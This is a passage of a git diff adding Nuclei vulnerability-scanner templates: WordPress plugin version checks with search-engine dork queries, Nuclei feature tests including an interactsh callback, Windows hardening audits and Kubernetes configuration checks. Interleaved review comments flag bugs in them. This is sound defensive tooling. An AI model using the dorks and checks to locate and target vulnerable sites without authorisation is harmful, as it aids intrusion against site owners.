+ matchers:
+ - type: word
+ words:
+ - ".exe"
+ - ".ps1"
diff --git a/poc/other/beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55.yaml b/poc/other/beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55.yaml
new file mode 100644
index 0000000000..93174c8484
--- /dev/null
+++ b/poc/other/beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55.yaml
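Review bot: Entries in the Startup folder are almost always `.lnk` shortcuts (plus `.bat`, `.cmd`, `.vbs`, `.js`, `.hta` scripts), so matching only `".exe"` and `".ps1"` misses the typical persistence artefact; report every entry in the directory, or at least extend `words` with `".lnk"`, `".bat"`, `".cmd"`, `".vbs"`, `".js"`. Only the all-users folder under `$env:ProgramData` is listed; the per-user folder `$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup` of the running account and the `Run`/`RunOnce` keys under `HKLM`/`HKCU` are the more common locations and are not covered. Any file present is reported as "unauthorized" although nothing is compared against an allow-list, so the description should say "present" instead.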
@@ -0,0 +1,59 @@ +id: beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55 + +info: + name: > + Beaver Builder – WordPress Page Builder <= 2.8.4.2 - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via Button Widget + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7cfab048-efc6-4c7c-a1bd-0a9daf8779bc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.4.2') \ No newline at end of file diff --git a/poc/other/cname.yaml b/poc/other/cname.yaml new file mode 100644 index 0000000000..f4ddb8a2ed --- /dev/null +++ b/poc/other/cname.yaml @@ -0,0 +1,18 @@ +id: dns-cname-query-example + +info: + name: Test DNS CNAME Query Template + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" + type: CNAME + class: inet + recursion: true + retries: 3 + matchers: + - type: word + part: all + words: + - "CNAME" diff --git a/poc/other/code-template-1.yaml b/poc/other/code-template-1.yaml new file mode 100644 index 0000000000..81a9773ae0 --- /dev/null +++ b/poc/other/code-template-1.yaml 
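Review bot: As with the other generated Wordfence templates in this commit, `description: >` and all `classification:` fields are empty, so the finding carries nothing but its title and a link; fill `description` from the referenced advisory. The `Stable tag` regex `[0-9.]+` does not capture a readme that says `trunk`, leaving `version` unset for `compare_versions(version, '<= 2.8.4.2')`; confirm how the DSL treats an empty value and add a guard such as `version != ''` if it does not already fail closed. `shodan-query: 'vuln:'` is a placeholder and should be removed.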
@@ -0,0 +1,22 @@ +id: code-template-1 + +info: + name: code-template-1 + author: tovask + severity: info + tags: code + +code: + - engine: + - py + - python3 + - python + source: | + print("hello from first") + extractors: + - type: regex + name: extracted + regex: + - 'hello from (.*)' + group: 1 +# digest: 490a00463044022050da011362cf08c2cb81e812c7f86d7282afe0562d4bf00d390f1300d19bc910022029e9d305da69e941ac18797645aecb217abde6557f891e141301b48e89a3c0cd:4a3eb6b4988d95847d4203be25ed1d46 \ No newline at end of file diff --git a/poc/other/code-template-2.yaml b/poc/other/code-template-2.yaml new file mode 100644 index 0000000000..1fb9805501 --- /dev/null +++ b/poc/other/code-template-2.yaml @@ -0,0 +1,21 @@ +id: code-template-2 + +info: + name: code-template-2 + author: tovask + severity: info + tags: code + +code: + - engine: + - py + - python3 + - python + source: | + import os + print("hello from " + os.getenv("extracted")) + matchers: + - type: word + words: + - "hello from first" +# digest: 4b0a00483046022100b3b8759c0df028455eb59b1433ac240e5d4604b011bb0c63680bd3cc159ac6f0022100f44aa11b640d11ad0e2902897f4eb51666ab3cd83c31dfd2590f6e43391e39b0:4a3eb6b4988d95847d4203be25ed1d46 \ No newline at end of file diff --git a/poc/other/code-value-share-workflow.yaml b/poc/other/code-value-share-workflow.yaml new file mode 100644 index 0000000000..a7c27b5eab --- /dev/null +++ b/poc/other/code-value-share-workflow.yaml @@ -0,0 +1,12 @@ +id: code-value-sharing-workflow + +info: + name: Code Value Sharing Workflow + author: tovask + severity: info + tags: code + +workflows: + - template: workflow/code-template-1.yaml + subtemplates: + - template: workflow/code-template-2.yaml diff --git a/poc/other/complex-conditions.yaml b/poc/other/complex-conditions.yaml new file mode 100644 index 0000000000..bd1e66be5d --- /dev/null +++ b/poc/other/complex-conditions.yaml 
@@ -0,0 +1,23 @@ +id: complex-conditions-workflow + +info: + name: Complex Conditions Workflow + author: tovask + severity: info + description: Workflow to test a complex scenario, e.g. race conditions when evaluating the results of the templates + +workflows: + - template: workflow/match-1.yaml + subtemplates: + - template: workflow/nomatch-1.yaml + subtemplates: + - template: workflow/match-2.yaml + - template: workflow/match-3.yaml + - template: workflow/match-2.yaml + matchers: + - name: test-matcher + subtemplates: + - template: workflow/nomatch-1.yaml + subtemplates: + - template: workflow/match-1.yaml + - template: workflow/match-3.yaml diff --git a/poc/other/conditional-flow.yaml b/poc/other/conditional-flow.yaml new file mode 100644 index 0000000000..8cb687b248 --- /dev/null +++ b/poc/other/conditional-flow.yaml @@ -0,0 +1,23 @@ +id: ghost-blog-detection +info: + name: Ghost blog detection + author: pdteam + severity: info + + +flow: dns() && http() + + +dns: + - name: "{{FQDN}}" + type: CNAME + +http: + - method: GET + path: + - "{{BaseURL}}?ref={{dns_cname}}" + + matchers: + - type: word + words: + - "ghost.io" \ No newline at end of file diff --git a/poc/other/disable-path-automerge.yaml b/poc/other/disable-path-automerge.yaml new file mode 100644 index 0000000000..8748f2ecdf --- /dev/null +++ b/poc/other/disable-path-automerge.yaml @@ -0,0 +1,21 @@ +id: test + +info: + name: test + author: pdteam + severity: info + +http: + - raw: + - | + GET /api/v1/test?id=123 HTTP/1.1 + Host: {{Hostname}} + - | + GET HTTP/1.1 + Host: {{Hostname}} + disable-path-automerge: true + matchers: + - type: status + status: + - 200 + \ No newline at end of file diff --git a/poc/other/display-last-username-enabled.yaml b/poc/other/display-last-username-enabled.yaml new file mode 100644 index 0000000000..443dfb7fb0 --- /dev/null +++ b/poc/other/display-last-username-enabled.yaml 
@@ -0,0 +1,32 @@ +id: display-last-username-enabled + +info: + name: Do Not Display Last User Name Disabled + author: princechaddha + severity: medium + description: Verifies if the system displays the last logged-in username, which may aid unauthorized access attempts. + impact: | + Displaying the last user name on the login screen can assist attackers in targeting accounts. + remediation: | + Enable the policy to hide the last logged-in username. + tags: login,username,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'DontDisplayLastUserName' + + matchers: + - type: word + words: + - "0" diff --git a/poc/other/dns-ns-probe.yaml b/poc/other/dns-ns-probe.yaml new file mode 100644 index 0000000000..ef88e6dd92 --- /dev/null +++ b/poc/other/dns-ns-probe.yaml @@ -0,0 +1,43 @@ +id: dns-ns-probe + +info: + name: Nuclei flow dns ns probe + author: pdteam + severity: info + description: Description of the Template + reference: https://example-reference-link + +flow: | + dns("fetch-ns"); + for(let ns of template["nameservers"]) { + set("nameserver",ns); + dns("probe-ns"); + }; + +dns: + - id: "fetch-ns" + name: "{{FQDN}}" + type: NS + matchers: + - type: word + words: + - "IN\tNS" + internal: true + extractors: + - type: regex + internal: true + name: "nameservers" + group: 1 + regex: + - "IN\tNS\t(.+)" + + - id: "probe-ns" + name: "{{nameserver}}" + type: A + class: inet + retries: 3 + recursion: true + extractors: + - type: dsl + dsl: + - "a" \ No newline at end of file diff --git a/poc/other/download-unsigned-activex-allowed.yaml b/poc/other/download-unsigned-activex-allowed.yaml new file mode 100644 index 0000000000..2459ae4b0e --- /dev/null +++ b/poc/other/download-unsigned-activex-allowed.yaml 
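Review bot: The word matcher `"0"` is checked against the full `Get-ItemProperty` object dump (value plus PSPath/provider fields), not the value alone, and when `DontDisplayLastUserName` is not set at all (the default, in which the last user name *is* shown) the cmdlet errors and nothing is reported, so the default insecure state is a false negative. Select the value and treat absence as 0: `$v = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'DontDisplayLastUserName' -ErrorAction SilentlyContinue).DontDisplayLastUserName; if (-not $v) { 'DontDisplayLastUserName : 0' }` and match that literal. `id: display-last-username-enabled` next to `name: Do Not Display Last User Name Disabled` is a double negative; reword one of them.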
@@ -0,0 +1,32 @@ +id: download-unsigned-activex-allowed + +info: + name: Download of Unsigned ActiveX Controls Allowed + author: princechaddha + severity: high + description: Verifies if the system allows downloading and installing unsigned ActiveX controls. + impact: | + Allowing unsigned ActiveX controls can lead to the execution of malicious code. + remediation: | + Disable the download and installation of unsigned ActiveX controls. + tags: activex,code-signing,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + $prop = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0' -Name '1004' -ErrorAction SilentlyContinue; if ($null -eq $prop.'1004') { "Property '1004' does not exist" } else { $prop.'1004' } + + matchers: + - type: word + words: + - "1004=0" diff --git a/poc/other/evaluate-variables.yaml b/poc/other/evaluate-variables.yaml new file mode 100644 index 0000000000..f1a6fd98c0 --- /dev/null +++ b/poc/other/evaluate-variables.yaml @@ -0,0 +1,30 @@ +id: dns-ssl-http-with-variables + +info: + name: multi protocol request with dynamic values + author: pdteam + severity: info + + +variables: + cname_filtered: '{{trim_suffix(dns_cname,".ghost.io")}}' + +dns: + - name: "{{FQDN}}" # DNS Request + type: cname + +ssl: + - address: "{{Hostname}}" # ssl request + +http: + - method: GET # http request + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(http_body,'ProjectDiscovery.io') # check for http string + - cname_filtered == 'projectdiscovery' # check for cname (extracted information from dns response) + - ssl_subject_cn == 'blog.projectdiscovery.io' + condition: and \ No newline at end of file 
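Review bot: The script prints either `Property '1004' does not exist` or the bare value of `$prop.'1004'` (e.g. `0`), but the matcher looks for `"1004=0"`, a string the script never emits, so this template cannot match. Emit the value with its name, `else { "1004=$($prop.'1004')" }`, and keep the matcher. Zone `0` is the Local Machine zone; the "Download unsigned ActiveX controls" setting that matters for web content is the same `1004` value under `Zones\3` (Internet) and `Zones\4` (Restricted), and the machine-wide policy copy lives under `HKLM:\...\Internet Settings\Zones`, whereas the `HKCU:` read here only reflects the account nuclei runs as.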
diff --git a/poc/other/exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5.yaml b/poc/other/exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5.yaml new file mode 100644 index 0000000000..8dfa91f22c --- /dev/null +++ b/poc/other/exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5.yaml @@ -0,0 +1,59 @@ +id: exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5 + +info: + name: > + Exclusive Addons for Elementor <= 2.7.4 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc931943-13f3-4ab1-b70f-c234253ca269?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/exclusive-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/exclusive-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,exclusive-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/exclusive-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "exclusive-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file diff --git a/poc/other/exported-response-vars.yaml b/poc/other/exported-response-vars.yaml new file mode 100644 index 0000000000..1edfa65f34 --- /dev/null +++ b/poc/other/exported-response-vars.yaml 
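Review bot: `description: >` and the `classification:` fields are empty here as in the sibling templates, so the finding is just a title and the Wordfence link; populate `description` from the advisory. The `shodan-query: 'vuln:'` placeholder does not identify this plugin and should be dropped. Because detection is the readme `Stable tag` alone, the template reports "version at or below 2.7.4" and cannot see a backported fix; say so in `description` to avoid over-claiming an information-exposure finding.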
@@ -0,0 +1,26 @@ +id: dns-ssl-http-proto-prefix + +info: + name: multi protocol request with dynamic values + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" # DNS Request + type: cname + +ssl: + - address: "{{Hostname}}" # ssl request + +http: + - method: GET # http request + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(http_body,'ProjectDiscovery.io') # check for http string + - trim_suffix(dns_cname,'.ghost.io') == 'projectdiscovery' # check for cname (extracted information from dns response) + - ssl_subject_cn == 'blog.projectdiscovery.io' + condition: and \ No newline at end of file diff --git a/poc/other/fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c.yaml b/poc/other/fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c.yaml new file mode 100644 index 0000000000..79dfde3155 --- /dev/null +++ b/poc/other/fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c.yaml 
@@ -0,0 +1,59 @@ +id: fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c + +info: + name: > + FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f79164c2-be3b-496d-b747-3e4b60b7fc2b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/fileorganizer/" + google-query: inurl:"/wp-content/plugins/fileorganizer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,fileorganizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fileorganizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fileorganizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.9') \ No newline at end of file diff --git a/poc/other/flow-hide-matcher.yaml b/poc/other/flow-hide-matcher.yaml new file mode 100644 index 0000000000..98bbbdf339 --- /dev/null +++ b/poc/other/flow-hide-matcher.yaml @@ -0,0 +1,29 @@ +id: flow-hide-matcher + +info: + name: Test Flow Hide Matcher + author: pdteam + severity: info + description: In Template any matcher can be marked as internal which hides it from the output. + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - ok + internal: true + + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "Failed event" \ No newline at end of file 
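Review bot: `severity: low` (and the `low` tag) is inconsistent with the title "Authenticated (Subscriber+) Arbitrary File Upload": a subscriber-level arbitrary upload normally rates high or critical because it leads to code execution, so the severity looks like a generator default and should be checked against the Wordfence entry. `description: >` and the `classification:` block are empty, and `shodan-query: 'vuln:'` is a placeholder; fill or drop them. As with the other readme-based checks, the `Stable tag` comparison infers the version and cannot see a backported fix, which matters more at this severity.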
diff --git a/poc/other/get-hotfix.yaml b/poc/other/get-hotfix.yaml new file mode 100644 index 0000000000..8258bd554e --- /dev/null +++ b/poc/other/get-hotfix.yaml @@ -0,0 +1,27 @@ +id: get-hotfix + +info: + name: List HotFix - Windows + author: pussycat0x + severity: info + description: | + A hotfix in Windows refers to a small, targeted software update issued by Microsoft to address a specific issue or vulnerability in the operating system or software. Hotfixes are typically released to fix critical problems that can't wait for the next scheduled update or service pack. These issues may include security vulnerabilities, stability problems, or bugs that affect the system's performance or functionality. + tags: code,windows,hotfix,ps + +self-contained: true +code: + - engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + - -File + pattern: "*.ps1" + source: | + Get-HotFix + + extractors: + - type: dsl + dsl: + - response diff --git a/poc/other/guest-account-enabled.yaml b/poc/other/guest-account-enabled.yaml new file mode 100644 index 0000000000..e362946162 --- /dev/null +++ b/poc/other/guest-account-enabled.yaml @@ -0,0 +1,32 @@ +id: guest-account-enabled + +info: + name: Guest Account Enabled + author: princechaddha + severity: high + description: Checks if the Guest account is enabled. + impact: | + Enabling the Guest account can allow unauthorized users to access the system with minimal restrictions. + remediation: | + Disable the Guest account to reduce the risk of unauthorized access. + tags: windows,user,account,guest,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + (Get-WmiObject -Class Win32_UserAccount -Filter "Name='Guest' and LocalAccount=True").Disabled + + matchers: + - type: word + words: + - "False" \ No newline at end of file 
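Review bot: The `Name='Guest'` filter misses the built-in guest account whenever it has been renamed, which is itself a common hardening step, so a renamed-but-enabled guest account passes the check. Identify it by its well-known RID instead: `Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-501' } | Select-Object -ExpandProperty Enabled` and match `True` (or with CIM, `Get-CimInstance Win32_UserAccount -Filter "LocalAccount=True" | Where-Object { $_.SID -like '*-501' }`), which also retires the deprecated `Get-WmiObject`. The `"False"` matcher fires on any `False` the command prints; matching the selected property value is safer.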
diff --git a/poc/other/headless-1.yaml b/poc/other/headless-1.yaml new file mode 100644 index 0000000000..dfc297d436 --- /dev/null +++ b/poc/other/headless-1.yaml @@ -0,0 +1,15 @@ +id: headless-1 +info: + name: Headless 1 + author: pdteam + severity: info + tags: headless + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}/headless1" + + - action: waitload + \ No newline at end of file diff --git a/poc/other/headless-self-contained.yaml b/poc/other/headless-self-contained.yaml new file mode 100644 index 0000000000..8f83eaf5e9 --- /dev/null +++ b/poc/other/headless-self-contained.yaml @@ -0,0 +1,20 @@ +id: headless-self-contained +info: + name: Headless Self Contained + author: pdteam + severity: info + tags: headless + +self-contained: true + +headless: + - steps: + - action: navigate + args: + url: "https://postman-echo.com/get?q={{query}}" + + - action: waitload + matchers: + - type: word + words: + - "selfcontained" \ No newline at end of file diff --git a/poc/other/headless-waitevent.yaml b/poc/other/headless-waitevent.yaml new file mode 100644 index 0000000000..d5ae94fa8f --- /dev/null +++ b/poc/other/headless-waitevent.yaml @@ -0,0 +1,24 @@ +id: headless-waitevent + +info: + name: WaitEvent + severity: info + author: pdteam + +headless: + - steps: + # note waitevent must be used before navigating to any page + # unlike waitload + - action: waitevent + args: + event: 'Page.loadEventFired' + max-duration: 15s + + - action: navigate + args: + url: "{{BaseURL}}/" + + matchers: + - type: word + words: + - "" \ No newline at end of file diff --git a/poc/other/idle-timeout-Interval.yaml b/poc/other/idle-timeout-Interval.yaml new file mode 100644 index 0000000000..4558421043 --- /dev/null +++ b/poc/other/idle-timeout-Interval.yaml 
@@ -0,0 +1,26 @@ +id: idle-timeout-interval + +info: + name: Set SSH Idle Timeout Interval + author: pussycat0x + severity: info + description: | + Automatically disconnect idle sessions to reduce the risk of unauthorized access. + remediation: | + Change it to : ClientAliveInterval 300 ,ClientAliveCountMax 0 + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://support.forcepoint.com/s/article/000015900 + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "ClientAliveInterval" + - "ClientAliveCountMax" + negative: true + condition: or \ No newline at end of file diff --git a/poc/other/insecure-cipher-suites-enabled.yaml b/poc/other/insecure-cipher-suites-enabled.yaml new file mode 100644 index 0000000000..728dd1c034 --- /dev/null +++ b/poc/other/insecure-cipher-suites-enabled.yaml @@ -0,0 +1,33 @@ +id: insecure-cipher-suites-enabled + +info: + name: Insecure Cipher Suites Enabled + author: princechaddha + severity: high + description: Checks if insecure cipher suites are enabled. + impact: | + Enabling insecure cipher suites can lead to weak encryption, making it easier for attackers to decrypt sensitive data. + remediation: | + Disable insecure cipher suites such as those using RC4 or DES encryption. + tags: windows,cipher,security,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-TlsCipherSuite | Where-Object { $_.CipherSuite -match "RC4|DES" } + + matchers: + - type: word + words: + - "RC4" + - "DES" diff --git a/poc/other/interactsh-requests-mc-and.yaml b/poc/other/interactsh-requests-mc-and.yaml new file mode 100644 index 0000000000..ea9f037e94 --- /dev/null +++ b/poc/other/interactsh-requests-mc-and.yaml 
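Review bot: The remediation `ClientAliveCountMax 0` does the opposite of what is intended on current OpenSSH: sshd_config(5) states that a zero `ClientAliveCountMax` disables connection termination, so the idle session is never dropped; recommend `ClientAliveInterval 300` with `ClientAliveCountMax 3` (or the value your baseline sets — confirm against the OpenSSH release in use). The `file` block uses `extensions: - all` with a `negative` matcher, so every file that is not an sshd configuration lacks both words and is reported; restrict the scan to `sshd_config`. Presence of the keyword is also not compliance: `ClientAliveInterval 0` satisfies the check while disabling the timer, so a regex such as `^\s*ClientAliveInterval\s+[1-9]` (negated) would be more faithful.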
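Review bot: The filter `-match "RC4|DES"` covers RC4 and (3)DES but not the other suites a TLS baseline rejects — NULL-cipher, EXPORT, MD5-MAC and the non-forward-secret `TLS_RSA_*` suites — so a host enabled only with those is reported clean; widen it to `-match "NULL|EXPORT|MD5|RC4|DES"` and decide explicitly about `TLS_RSA_`. `Get-TlsCipherSuite` exists only on Windows 10 / Server 2016 and later and lists what the OS will offer, not what a given service negotiates; state that scope in `description`. Since the word matcher only needs `RC4`/`DES` somewhere in the output, an extractor returning each offending suite's `Name` would make the finding actionable.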
@@ -0,0 +1,27 @@ +id: interactsh-requests-mc-and + +info: + name: interactsh multi request matcher condition + author: pdteam + severity: info + +http: + - raw: + - | + GET /api/geoping/{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: dsl + dsl: + - "status_code_2 == 200" \ No newline at end of file diff --git a/poc/other/iterate-one-value-flow.yaml b/poc/other/iterate-one-value-flow.yaml new file mode 100644 index 0000000000..9ab6633c0c --- /dev/null +++ b/poc/other/iterate-one-value-flow.yaml @@ -0,0 +1,37 @@ +id: flow-iterate-one-value-flow + +info: + name: Test Flow Iterate One Value Flow + author: pdteam + severity: info + description: | + If length of template.extracted variable is not know, i.e it could be an array of 1 or more values, then iterate function + should be used to iterate over values because nuclei by default converts array to string if it has only 1 value. + +flow: | + http(1) + for(let value of iterate(template.extracted)){ + set("value", value) + http(2) + } + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + name: extracted + internal: true + regex: + - "[ok]+" + + - method: GET + path: + - "{{BaseURL}}/{{value}}" + + matchers: + - type: word + words: + - "ok" \ No newline at end of file diff --git a/poc/other/k8s-allow-privilege-escalation-set.yaml b/poc/other/k8s-allow-privilege-escalation-set.yaml new file mode 100644 index 0000000000..81d40e6b4e --- /dev/null +++ b/poc/other/k8s-allow-privilege-escalation-set.yaml 
@@ -0,0 +1,51 @@ +id: k8s-allow-privilege-escalation-set + +info: + name: Containers run with allowPrivilegeEscalation enabled + author: princechaddha + severity: critical + description: Checks for containers running with the allowPrivilegeEscalation flag enabled, which can increase security risks by allowing privileges to be escalated + impact: | + Enabling allowPrivilegeEscalation in container deployments can result in elevated privileges, potentially allowing attackers to gain further access to host resources. This poses significant security risks. + remediation: Ensure that the allowPrivilegeEscalation flag is set to false in all container configurations to minimize security risks + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,security,devsecops,containers,k8s,k8s-cluster-security +flow: | + code(1); + for (let container of template.items) { + set("container", container) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {pod: .metadata.name, containers: .spec.containers}' + +javascript: + - code: | + let podData = JSON.parse(template.container); + podData.containers.forEach(container => { + if (container.securityContext && container.securityContext.allowPrivilegeEscalation === true) { + let result = (`Container '${container.name}' in pod '${podData.pod}' running with allowPrivilegeEscalation enabled.`); + Export(result); + } + }); + + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100b82b8a61d07a1fd3eb1d4c0e294e1c0ad03620d317280f0708493d3422a9654002207d8421e313c2d1eb9c5c6e0f5efc9193088d15ebe536aa77e70a0104ced336c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
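Review bot: The JavaScript only reports containers whose `securityContext.allowPrivilegeEscalation === true`, but the Kubernetes default when the field is unset is true, so the most common non-compliant case (no securityContext at all) is silently passed; the restricted Pod Security Standard requires the field to be explicitly false, so the condition should be `if (!container.securityContext || container.securityContext.allowPrivilegeEscalation !== false)`. The jq extractor also drops `.metadata.namespace` and `.spec.initContainers`, so findings cannot be located to a namespace and init containers are never inspected; including both in the extracted object and looping over `(podData.containers || []).concat(podData.initContainers || [])` would make the check complete.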
diff --git a/poc/other/k8s-cpu-limits-not-set.yaml b/poc/other/k8s-cpu-limits-not-set.yaml new file mode 100644 index 0000000000..15f6a3468f --- /dev/null +++ b/poc/other/k8s-cpu-limits-not-set.yaml @@ -0,0 +1,50 @@ +id: k8s-cpu-limits-not-set + +info: + name: CPU limits not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing CPU limits in Kubernetes Deployments, which can lead to excessive CPU usage and affect other applications + impact: | + Missing CPU limits in Kubernetes Deployments can cause excessive CPU usage that can starve other applications, leading to performance degradation across the cluster. + remediation: | + Set CPU limits for all containers in Kubernetes Deployments to ensure fair CPU resource distribution and prevent performance issues. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.limits && container.resources.limits.cpu)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks CPU limits.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022064b9824c34dbebcb7d936cbbf3122ceded2d676ef71282c84107d3d18a0602320221008dff215249847ff57a2283c9b3ff4fe970ed648f23817c50be51ecb16994fdb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
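Review bot: The check uses `containers.some(...)`, so a Deployment passes as soon as one container declares a CPU limit even if every other container in the pod template has none; the intent stated in the description (limits for all containers) needs `every`, i.e. `if (!deployment.spec.template.spec.containers.every(container => container.resources && container.resources.limits && container.resources.limits.cpu)) {`, with the message reworded to "has at least one container without CPU limits". The same `some`/`every` inversion is present in k8s-cpu-requests-not-set, k8s-memory-limits-not-set, k8s-memory-requests-not-set and k8s-readiness-probe-not-set in this patch. As a point of style, `deployment = JSON.parse(...)` assigns an undeclared global; `let deployment = ...` matches the other templates here.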
diff --git a/poc/other/k8s-cpu-requests-not-set.yaml b/poc/other/k8s-cpu-requests-not-set.yaml new file mode 100644 index 0000000000..23e0d4d441 --- /dev/null +++ b/poc/other/k8s-cpu-requests-not-set.yaml @@ -0,0 +1,50 @@ +id: k8s-cpu-requests-not-set + +info: + name: CPU Requests not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing CPU requests in Kubernetes Deployments, which can lead to inadequate scheduling and resource allocation. + impact: | + Missing CPU requests in Kubernetes Deployments can cause poor scheduling decisions and suboptimal resource allocation, potentially leading to degraded application performance. + remediation: | + Set CPU requests for all containers in Kubernetes Deplayments to ensure efficient scheduling and resource allocation. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if 